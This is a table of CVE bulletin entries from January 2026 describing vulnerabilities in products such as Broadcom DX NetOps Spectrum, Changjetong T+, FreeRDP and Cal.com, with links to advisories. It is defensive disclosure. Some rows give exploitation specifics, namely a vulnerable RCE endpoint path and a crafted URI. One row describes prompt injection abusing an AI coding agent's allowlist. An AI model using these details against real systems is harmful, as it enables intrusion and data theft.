| Apple--iOS and iPadOS | The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.1 and iPadOS 18.1. An app may be able to corrupt coprocessor memory. | 2026-01-16 | not yet calculated | CVE-2024-44238 | https://support.apple.com/en-us/121563 |
| Apple--iOS and iPadOS | This issue was addressed through improved state management. This issue is fixed in iOS 18.1 and iPadOS 18.1. A user may be able to view restricted content from the lock screen. | 2026-01-16 | not yet calculated | CVE-2024-54556 | https://support.apple.com/en-us/121563 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 18.3 and iPadOS 18.3. An app may be able to enumerate a user's installed apps. | 2026-01-16 | not yet calculated | CVE-2025-24089 | https://support.apple.com/en-us/122066 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 18.3 and iPadOS 18.3. An app may be able to enumerate a user's installed apps. | 2026-01-16 | not yet calculated | CVE-2025-24090 | https://support.apple.com/en-us/122066 |
| Apple--macOS | This issue was addressed with improved permissions checking. This issue is fixed in macOS Sequoia 15.1. An app may be able to access user-sensitive data. | 2026-01-16 | not yet calculated | CVE-2024-44210 | https://support.apple.com/en-us/121564 |
| Apple--macOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2026-01-16 | not yet calculated | CVE-2025-43508 | https://support.apple.com/en-us/125634 |
| Apple--Xcode | A permissions issue was addressed with additional restrictions. This issue is fixed in Xcode 16.3. An app may be able to bypass Privacy preferences. | 2026-01-16 | not yet calculated | CVE-2025-31186 | https://support.apple.com/en-us/122380 |
| Arm--Neoverse-N2 | In certain Arm CPUs, a CPP RCTX instruction executed on one Processing Element (PE) may inhibit TLB invalidation when a TLBI is issued to the PE, either by the same PE or another PE in the shareability domain. In this case, the PE may retain stale TLB entries which should have been invalidated by the TLBI. | 2026-01-14 | not yet calculated | CVE-2025-0647 | https://developer.arm.com/documentation/111546 |
| Assaf Parag--Poll, Survey & Quiz Maker Plugin by Opinion Stage | Poll, Survey & Quiz Maker Plugin by Opinion Stage WordPress plugin versions prior to 19.6.25 contain a stored cross-site scripting (XSS) vulnerability via multiple parameters due to insufficient input validation and output escaping. An unauthenticated attacker can inject arbitrary script into content that executes when a victim views an affected page. | 2026-01-16 | not yet calculated | CVE-2019-25297 | https://wpscan.com/vulnerability/4ed1edd6-3813-44a3-bee7-f07c1774b679/ https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-polls-by-opinionstage/poll-survey-quiz-maker-plugin-by-opinion-stage-19625-unauthenticated-stored-cross-site-scripting https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-poll-survey-form-quiz-maker-by-opinionstage-cross-site-scripting-19-6-24/ https://wordpress.org/plugins/social-polls-by-opinionstage/ https://plugins.trac.wordpress.org/changeset/2158590/social-polls-by-opinionstage https://web.archive.org/web/20191020011448/https://www.pluginvulnerabilities.com/2019/09/16/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-poll-survey-form-quiz-maker-by-opinionstage/ https://www.vulncheck.com/advisories/poll-survey-and-quiz-maker-plugin-by-opinion-stage-stored-xss |
| Automai--Automai | An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges | 2026-01-12 | not yet calculated | CVE-2025-46066 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/4e325d09d08e16efb506076da2184f42 |
| Automai--Automai | An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges and obtain sensitive information via a crafted js file | 2026-01-12 | not yet calculated | CVE-2025-46067 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/98204cff0065e611cf9e9acc3be59e03 |
| Automai--Automai | An issue in Automai Director v.25.2.0 allows a remote attacker to execute arbitrary code via the update mechanism | 2026-01-12 | not yet calculated | CVE-2025-46068 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/00ea6cce1299e1d999b5d1faac4248f1 |
| Automai--Automai | An issue in Automai BotManager v.25.2.0 allows a remote attacker to execute arbitrary code via the BotManager.exe component | 2026-01-12 | not yet calculated | CVE-2025-46070 | https://www.automai.com/ https://gist.github.com/ZeroBreach-GmbH/776dd7e927d9b2f8ef10807abe124f8e |
| bee interactive--Livewire Filemanager | Livewire Filemanager, commonly used in Laravel applications, contains LivewireFilemanagerComponent.php, which does not perform file type and MIME validation, allowing for RCE through upload of a malicious php file that can then be executed via the /storage/ URL if a commonly performed setup process within Laravel applications has been completed. | 2026-01-16 | not yet calculated | CVE-2025-14894 | https://github.com/livewire-filemanager/filemanager https://hackingbydoing.wixsite.com/hackingbydoing/post/unauthenticated-rce-in-livewire-filemanager |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX backend APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable APIs. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform. | 2026-01-14 | not yet calculated | CVE-2026-22236 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to the exposure of sensitive internal API documentation. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the APIs exposed by the documentation. Successful exploitation of this vulnerability could allow the attacker to cause damage to the targeted platform by abusing internal functionality. | 2026-01-14 | not yet calculated | CVE-2026-22237 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX admin APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable admin API to create a new user with admin privileges. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in to the newly-created admin user. | 2026-01-14 | not yet calculated | CVE-2026-22238 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to design flaws in the email sending API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable email sending API. Successful exploitation of this vulnerability could allow the attacker to send unsolicited emails to anyone on behalf of the company. | 2026-01-14 | not yet calculated | CVE-2026-22239 | https://blusparkglobal.com/bluvoyix/ |
| Bluspark Global--BLUVOYIX | The vulnerability exists in BLUVOYIX due to an improper password storage implementation and subsequent exposure via unauthenticated APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable users API to retrieve the plaintext passwords of all users. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform by logging in using an exposed admin email address and password. | 2026-01-14 | not yet calculated | CVE-2026-22240 | https://blusparkglobal.com/bluvoyix/ |
| Broadcom--DX NetOps Spectrum | Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Path Traversal. This issue affects DX NetOps Spectrum: 24.3.8 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69267 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Reflected XSS. This issue affects DX NetOps Spectrum: 24.3.8 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69268 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows OS Command Injection. This issue affects DX NetOps Spectrum: 23.3.6 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69269 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Information Exposure Through Query Strings in GET Request vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Session Hijacking. This issue affects DX NetOps Spectrum: 24.3.8 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69270 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Insufficiently Protected Credentials vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Sniffing Attacks. This issue affects DX NetOps Spectrum: 24.3.13 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69271 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Cleartext Transmission of Sensitive Information vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Sniffing Attacks. This issue affects DX NetOps Spectrum: 21.2.1 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69272 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Improper Authentication vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Authentication Bypass. This issue affects DX NetOps Spectrum: 24.3.10 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69273 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Authorization Bypass Through User-Controlled Key vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Privilege Escalation. This issue affects DX NetOps Spectrum: 24.3.10 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69274 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Dependency on Vulnerable Third-Party Component vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows DOM-Based XSS. This issue affects DX NetOps Spectrum: 24.3.9 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69275 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| Broadcom--DX NetOps Spectrum | Deserialization of Untrusted Data vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Object Injection. This issue affects DX NetOps Spectrum: 24.3.13 and earlier. | 2026-01-12 | not yet calculated | CVE-2025-69276 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756 |
| calcom--cal.com | Cal.com is open-source scheduling software. From 3.1.6 to before 6.0.7, there is a vulnerability in a custom NextAuth JWT callback that allows attackers to gain full authenticated access to any user's account by supplying a target email address via session.update(). This vulnerability is fixed in 6.0.7. | 2026-01-13 | not yet calculated | CVE-2026-23478 | https://github.com/calcom/cal.com/security/advisories/GHSA-7hg4-x4pr-3hrg |
| Chainlit--Chainlit | Chainlit versions prior to 2.8.5 contain an authorization bypass through user-controlled key vulnerability. If this vulnerability is exploited, threads may be viewed or thread ownership may be obtained by an attacker who can log in to the product. | 2026-01-14 | not yet calculated | CVE-2025-68492 | https://github.com/Chainlit/chainlit/releases https://jvn.jp/en/jp/JVN34964581/ |
| Chamillo--Chamillo | An issue was discovered in Chamillo LMS 1.11.2. The Social Network /personal_data endpoint exposes full sensitive user information even after logout because proper cache-control is missing. Using the browser back button restores all personal data, allowing unauthorized users on the same device to view confidential information. This leads to profiling, impersonation, targeted attacks, and significant privacy risks. | 2026-01-16 | not yet calculated | CVE-2025-69581 | https://github.com/chamilo/chamilo-lms https://github.com/Rivek619/CVE-2025-69581 |
| Changjetong Information Technology Co., Ltd.--T+ | Changjetong T+ versions up to and including 16.x contain a .NET deserialization vulnerability in an AjaxPro endpoint that can lead to remote code execution. A remote attacker can send a crafted request to /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore with a malicious JSON body that leverages deserialization of attacker-controlled .NET types to invoke arbitrary methods such as System.Diagnostics.Process.Start. This can result in execution of arbitrary commands in the context of the T+ application service account. Exploitation evidence was observed by the Shadowserver Foundation on 2023-08-19 (UTC). | 2026-01-15 | not yet calculated | CVE-2023-7334 | https://www.chanjetvip.com/product/goods/detail?id=6077e91b70fa071069139f62 https://www.freebuf.com/articles/web/381731.html https://blog.csdn.net/qq_53003652/article/details/134031230 https://blog.csdn.net/u010025272/article/details/131553591 https://github.com/MD-SEC/MDPOCS/blob/main/ChangJieTongTPlus_GetStoreWarehouseByStore_Rce_Poc.py https://www.vulncheck.com/advisories/changjetong-tplus-getstorewarehousebystore-deserialization-rce |
| cursor--cursor | Cursor is a code editor built for programming with AI. Prior to 2.3, when the Cursor Agent is running in Auto-Run Mode with Allowlist mode enabled, certain shell built-ins can still be executed without appearing in the allowlist and without requiring user approval. This allows an attacker via indirect or direct prompt injection to poison the shell environment by setting, modifying, or removing environment variables that influence trusted commands. This vulnerability is fixed in 2.3. | 2026-01-14 | not yet calculated | CVE-2026-22708 | https://github.com/cursor/cursor/security/advisories/GHSA-82wg-qcm4-fp2w |
| Cyber Cafe--Cyber Cafe | A stored cross-site scripting (XSS) vulnerability exists in Cyber Cafe Management System v1.0. An authenticated attacker can inject arbitrary JavaScript code into the username parameter via the add-users.php endpoint. The injected payload is stored and executed in the victim's browser when the affected page is accessed. | 2026-01-15 | not yet calculated | CVE-2025-70890 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70890 |
| Cyber Cafe--Cyber Cafe | A stored cross-site scripting (XSS) vulnerability exists in Phpgurukul Cyber Cafe Management System v1.0 within the user management module. The application does not properly sanitize or encode user-supplied input submitted via the uadd parameter in the add-users.php endpoint. An authenticated attacker can inject arbitrary JavaScript code that is persistently stored in the database. The malicious payload is triggered when a privileged user clicks the View button on the view-allusers.php page. | 2026-01-15 | not yet calculated | CVE-2025-70891 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70891 |
| Cyber Cafe--Cyber Cafe | Phpgurukul Cyber Cafe Management System v1.0 contains a SQL Injection vulnerability in the user management module. The application fails to properly validate user-supplied input in the username parameter of the add-users.php endpoint. | 2026-01-15 | not yet calculated | CVE-2025-70892 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70892 |
| Cyber Cafe--Cyber Cafe | A time-based blind SQL Injection vulnerability exists in PHPGurukul Cyber Cafe Management System v1.0 within the adminprofile.php endpoint. The application fails to properly sanitize user-supplied input provided via the adminname parameter, allowing authenticated attackers to inject arbitrary SQL expressions. | 2026-01-15 | not yet calculated | CVE-2025-70893 | https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70893 |
| dask--distributed | Dask distributed is a distributed task scheduler for Dask. Prior to 2026.1.0, when Jupyter Lab, jupyter-server-proxy, and Dask distributed are all run together, it is possible to craft a URL which will result in code being executed by Jupyter due to a cross-site scripting (XSS) bug in the Dask dashboard. It is possible for attackers to craft a phishing URL that assumes Jupyter Lab and Dask may be running on localhost and using default ports. If a user clicks on the malicious link it will open an error page in the Dask Dashboard via the Jupyter Lab proxy which will cause code to be executed by the default Jupyter Python kernel. This vulnerability is fixed in 2026.1.0. | 2026-01-16 | not yet calculated | CVE-2026-23528 | https://github.com/dask/distributed/security/advisories/GHSA-c336-7962-wfj2 https://github.com/dask/distributed/commit/ab72092a8a938923c2bb51a2cd14ca26614827fa |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, GuardDog's safe_extract() function does not validate decompressed file sizes when extracting ZIP archives (wheels, eggs), allowing attackers to cause denial of service through zip bombs. A malicious package can consume gigabytes of disk space from a few megabytes of compressed data. This vulnerability is fixed in 2.7.1. | 2026-01-13 | not yet calculated | CVE-2026-22870 | https://github.com/DataDog/guarddog/security/advisories/GHSA-ffj4-jq7m-9g6v https://github.com/DataDog/guarddog/commit/c3fb07b4838945f42497e78b7a02bcfb1e63969b |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, a path traversal vulnerability exists in GuardDog's safe_extract() function that allows malicious PyPI packages to write arbitrary files outside the intended extraction directory, leading to Arbitrary File Overwrite and Remote Code Execution on systems running GuardDog. This vulnerability is fixed in 2.7.1. | 2026-01-13 | not yet calculated | CVE-2026-22871 | https://github.com/DataDog/guarddog/security/advisories/GHSA-xg9w-vg3g-6m68 https://github.com/DataDog/guarddog/commit/9aa6a725b2c71d537d3c18d1c15621395ebb879c |
| defenseunicorns--pepr | Pepr is a type safe K8s middleware. Prior to 1.0.5, Pepr defaults to a cluster-admin RBAC configuration and does not explicitly force or enforce least-privilege guidance for module authors. The default behavior exists to make the "getting started" experience smooth: new users can experiment with Pepr and create resources dynamically without needing to pre-configure RBAC. This vulnerability is fixed in 1.0.5. | 2026-01-16 | not yet calculated | CVE-2026-23634 | https://github.com/defenseunicorns/pepr/security/advisories/GHSA-w54x-r83c-x79q https://github.com/defenseunicorns/pepr/releases/tag/v1.0.5 |
| denoland--deno | Deno is a JavaScript, TypeScript, and WebAssembly runtime. Before 2.6.0, node:crypto doesn't finalize cipher. The vulnerability allows an attacker to have infinite encryptions. This can lead to naive attempts at brute forcing, as well as more refined attacks with the goal to learn the server secrets. This vulnerability is fixed in 2.6.0. | 2026-01-15 | not yet calculated | CVE-2026-22863 | https://github.com/denoland/deno/security/advisories/GHSA-5379-f5hf-w38v https://github.com/denoland/deno/releases/tag/v2.6.0 |
| Drupal--Facebook Pixel | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Drupal Facebook Pixel facebook_pixel allows Stored XSS. This issue affects Facebook Pixel: from 7.X-1.0 through 7.X-1.1. | 2026-01-14 | not yet calculated | CVE-2025-14557 | https://www.herodevs.com/vulnerability-directory/cve-2025-14557 https://d7es.tag1.com/security-advisories/facebook-pixel-less-critical-cross-site-scripting |
| Drupal--Flag | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Drupal Flag allows Cross-Site Scripting (XSS). This issue affects Flag: from 7.X-3.0 through 7.X-3.9. | 2026-01-14 | not yet calculated | CVE-2025-14556 | https://www.herodevs.com/vulnerability-directory/cve-2025-14556 https://d7es.tag1.com/security-advisories/flag-moderately-critical-cross-site-scripting-backdrop-sa-contrib-2025-011 |
| Eclipse Vert.x--Eclipse Vert.x | The Vert.x Web static handler component cache can be manipulated to deny access to static files served by the handler using a specifically crafted request URI. The issue comes from an improper implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in the Vert.x Core component (used by Vert.x Web): https://github.com/eclipse-vertx/vert.x/pull/5895 Steps to reproduce: Given a file served by the static handler, craft a URI that introduces a string like bar%2F..%2F after the last / char to deny access to the URI with an HTTP 404 response. For example https://example.com/foo/index.html can be denied with https://example.com/foo/bar%2F..%2Findex.html Mitigation: Disabling the Static Handler cache fixes the issue. StaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false); | 2026-01-15 | not yet calculated | CVE-2026-1002 | https://github.com/eclipse-vertx/vert.x/pull/5895 |
| eigent-ai--eigent | Eigent is a multi-agent Workforce. A critical security vulnerability in the CI workflow (.github/workflows/ci.yml) allows arbitrary code execution from fork pull requests with repository write permissions. The vulnerable workflow uses pull_request_target trigger combined with checkout of untrusted PR code. An attacker can exploit this to steal credentials, post comments, push code, or create releases. | 2026-01-13 | not yet calculated | CVE-2026-22869 | https://github.com/eigent-ai/eigent/security/advisories/GHSA-gvh4-93cq-5xxp https://github.com/eigent-ai/eigent/pull/836 https://github.com/eigent-ai/eigent/pull/837 https://github.com/eigent-ai/eigent/commit/bf02500bbbab0f01cd0ed8e6dc21fe5683d6bfb5 |
| eKoopmans--html2pdf.js | html2pdf.js converts any webpage or element into a printable PDF entirely client-side. Prior to 0.14.0, html2pdf.js contains a cross-site scripting (XSS) vulnerability when given a text source rather than an element. This text is not sufficiently sanitized before being attached to the DOM, allowing malicious scripts to be run on the client browser and risking the confidentiality, integrity, and availability of the page's data. This vulnerability has been fixed in html2pdf.js@0.14.0. | 2026-01-14 | not yet calculated | CVE-2026-22787 | https://github.com/eKoopmans/html2pdf.js/security/advisories/GHSA-w8x4-x68c-m6fc https://github.com/eKoopmans/html2pdf.js/issues/865 https://github.com/eKoopmans/html2pdf.js/pull/877 https://github.com/eKoopmans/html2pdf.js/commit/988826e336035b39a8608182d7b73c0e3cd78c7b https://github.com/eKoopmans/html2pdf.js/releases/tag/v0.14.0 |
| Emaintenance--Crazy Bubble Tea | In the Crazy Bubble Tea mobile application, an authenticated attacker can obtain personal information about other users by enumerating a `loyaltyGuestId` parameter. The server does not verify the permissions required to obtain the data. This issue was fixed in version 915 (Android) and 7.4.1 (iOS). | 2026-01-14 | not yet calculated | CVE-2025-14317 | https://crazybubble.pl/aplikacja-crazy-bubble/ https://cert.pl/posts/2026/01/CVE-2025-14317 |
| emlog--emlog | Emlog is an open source website building system. emlog v2.6.1 and earlier exposes a REST API endpoint (/index.php?rest-api=upload) for media file uploads. The endpoint fails to implement proper validation of file types, extensions, and content, allowing authenticated attackers (with a valid API key or admin session cookie) to upload arbitrary files (including malicious PHP scripts) to the server. An attacker can obtain the API key either by gaining administrator access to enable the REST API setting, or via information disclosure vulnerabilities in the application. Once uploaded, the malicious PHP file can be executed to gain remote code execution (RCE) on the target server, leading to full server compromise. | 2026-01-12 | not yet calculated | CVE-2026-22799 | https://github.com/emlog/emlog/security/advisories/GHSA-p837-mrw9-5x5j https://github.com/emlog/emlog/commit/429b02fda842254b9b9b39303e9161999c180560 |
| Enhancesoft--osTicket | Enhancesoft osTicket versions 1.18.3 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the generated PDF can embed the contents of attacker-selected files from the server filesystem as bitmap images, allowing disclosure of sensitive local files in the context of the osTicket application user. This issue is exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled. | 2026-01-12 | not yet calculated | CVE-2026-22200 | https://github.com/osTicket/osTicket/releases/tag/v1.18.3 https://github.com/osTicket/osTicket/commit/c59b067 https://www.vulncheck.com/advisories/osticket-pdf-export-arbitrary-file-read |
| Entrust Corporation--Instant Financial Issuance (IF) | Entrust Instant Financial Issuance (IFI) On Premise software (formerly referred to as CardWizard) versions 5.x, prior to 6.10.5, and prior to 6.11.1 contain an insecure .NET Remoting exposure in the SmartCardController service (DCG.SmartCardControllerService.exe). The service registers a TCP remoting channel with unsafe formatter/settings that permit untrusted remoting object invocation. A remote, unauthenticated attacker who can reach the remoting port can invoke exposed remoting objects to read arbitrary files from the server and coerce outbound authentication, and may achieve arbitrary file write and remote code execution via known .NET Remoting exploitation techniques. This can lead to disclosure of sensitive installation and service-account data and compromise of the affected host. | 2026-01-15 | not yet calculated | CVE-2026-23746 | https://www.entrust.com/products/issuance-systems/instant/financial-card https://trustedcare.entrust.com/s/article/E26-001-NET-Remoting-Vulnerabilities-in-the-Smart-Card-Controller-Service-of-the-Instant-Financial-Issuance-On-Premise-Software https://www.vulncheck.com/advisories/entrust-ifi-smartcardcontroller-service-net-remoting-rce |
| Eptura Archibus--Eptura Archibus | In Eptura Archibus 2024.03.01.109, the "Run script" and "Server File" components of the "Database Update Wizard" are vulnerable to directory traversal. | 2026-01-13 | not yet calculated | CVE-2025-25652 | https://eptura.com/our-platform/archibus/ https://packetstorm.news/files/id/213675 |
| Eramba--Eramba | A CORS misconfiguration in Eramba Community and Enterprise Editions v3.26.0 allows an attacker-controlled Origin header to be reflected in the Access-Control-Allow-Origin response along with Access-Control-Allow-Credentials: true. This permits malicious third-party websites to perform authenticated cross-origin requests against the Eramba API, including endpoints like /system-api/login and /system-api/user/me. The response includes sensitive user session data (ID, name, email, access groups), which is accessible to the attacker's JavaScript. This flaw enables full session hijack and data exfiltration without user interaction. Eramba versions 3.23.3 and earlier were tested and appear unaffected. The vulnerability is present in default installations, requiring no custom configuration. | 2026-01-13 | not yet calculated | CVE-2025-55462 | http://eramba.com https://discussions.eramba.org/t/release-3-28-0/7860 |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for web development. Prior to Go pseudoversion 0.0.0-20260116051925-c62ab83c589e, the software has a path traversal vulnerability due to an incomplete fix. `path.Clean` normalizes a path but does not prevent absolute paths in a malicious tar file. Commit https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16, corresponding to pseudoversion 0.0.0-20260116051925-c62ab83c589e, fixes this issue. | 2026-01-18 | not yet calculated | CVE-2026-23644 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-2657-3c98-63jq https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16 https://github.com/esm-dev/esm.sh/commit/c62ab83c589e7b421a0e1376d2a00a4e48161093 https://pkg.go.dev/vuln/GO-2025-4138 |
| ethereum--go-ethereum | go-ethereum (geth) is a golang execution layer implementation of the Ethereum protocol. A vulnerable node can be forced to shutdown/crash using a specially crafted message. This vulnerability is fixed in 1.16.8. | 2026-01-13 | not yet calculated | CVE-2026-22862 | https://github.com/ethereum/go-ethereum/security/advisories/GHSA-mr7q-c9w9-wh4h https://github.com/ethereum/go-ethereum/commit/abeb78c647e354ed922726a1d719ac7bc64a07e2 |
| ethereum--go-ethereum | go-ethereum (geth) is a golang execution layer implementation of the Ethereum protocol. A vulnerable node can be forced to shutdown/crash using a specially crafted message. This vulnerability is fixed in 1.16.8. | 2026-01-13 | not yet calculated | CVE-2026-22868 | https://github.com/ethereum/go-ethereum/security/advisories/GHSA-mq3p-rrmp-79jg https://github.com/ethereum/go-ethereum/commit/abeb78c647e354ed922726a1d719ac7bc64a07e2 |
| Flare Camera--Blurams | A vulnerability in the boot process of Blurams Flare Camera version 24.1114.151.929 and earlier allows a physically proximate attacker to hijack the boot mechanism and gain a bootloader shell via the UART interface. This is achieved by inducing a read error from the SPI flash memory during the boot, by shorting a data pin of the IC to ground. An attacker can then dump the entire firmware, leading to the disclosure of sensitive information including cryptographic keys and user configurations. | 2026-01-14 | not yet calculated | CVE-2025-65396 | http://blurams.com http://flare.com https://lessonsec.com/cve/cve-2025-65396/ |
| Flare Camera--Blurams | An insecure authentication mechanism in the safe_exec.sh startup script of Blurams Flare Camera version 24.1114.151.929 and earlier allows an attacker with physical access to the device to execute arbitrary commands with root privileges, if file /opt/images/public_key.der is not present in the file system. The vulnerability can be triggered by providing a maliciously crafted auth.ini file on the device's SD card. | 2026-01-14 | not yet calculated | CVE-2025-65397 | http://blurams.com http://flare.com https://lessonsec.com/cve/cve-2025-65397/ |
| flipped-aurora--gin-vue-admin | Gin-vue-admin is a backstage management system based on vue and gin. Gin-vue-admin <= v2.8.7 has a path traversal vulnerability in the breakpoint resume upload functionality. Attacker can upload any files on any directory. In the breakpoint_continue.go file, the MakeFile function accepts a fileName parameter through the /fileUploadAndDownload/breakpointContinueFinish API endpoint and directly concatenates it with the base directory path (./fileDir/) using os.OpenFile() without any validation for directory traversal sequences (e.g., ../). An attacker with file upload privileges could exploit this vulnerability. | 2026-01-12 | not yet calculated | CVE-2026-22786 | https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-3558-j79f-vvm6 https://github.com/flipped-aurora/gin-vue-admin/commit/2242f5d6e133e96d1b359ac019bf54fa0e975dd5 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. In 2.44.0 and earlier, there is a stored XSS vulnerability where a specially crafted image filename could execute malicious JavaScript when rendered on course or jobs pages. | 2026-01-14 | not yet calculated | CVE-2026-23497 | https://github.com/frappe/lms/security/advisories/GHSA-78mq-3whw-69j5 https://github.com/frappe/lms/commit/e7ccf0a711d0e0ab5e6b28b7a1e4e0510b6b9543 |
| FreeImage--FreeImage | FreeImage 3.18.0 contains a Use After Free in PluginTARGA.cpp;loadRLE(). | 2026-01-14 | not yet calculated | CVE-2025-70968 | https://github.com/MiracleWolf/FreeimageCrash/tree/main |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a race condition between the RDPGFX dynamic virtual channel thread and the SDL render thread leads to a heap use-after-free. Specifically, an escaped pointer to sdl->primary (SDL_Surface) is accessed after it has been freed during RDPGFX ResetGraphics handling. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22851 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8g87-6pvc-wh99 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a malicious RDP server can trigger a heap-buffer-overflow write in the FreeRDP client when processing Audio Input (AUDIN) format lists. audin_process_formats reuses callback->formats_count across multiple MSG_SNDIN_FORMATS PDUs and writes past the newly allocated formats array, causing memory corruption and a crash. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22852 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-9chc-g79v-4qq4 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
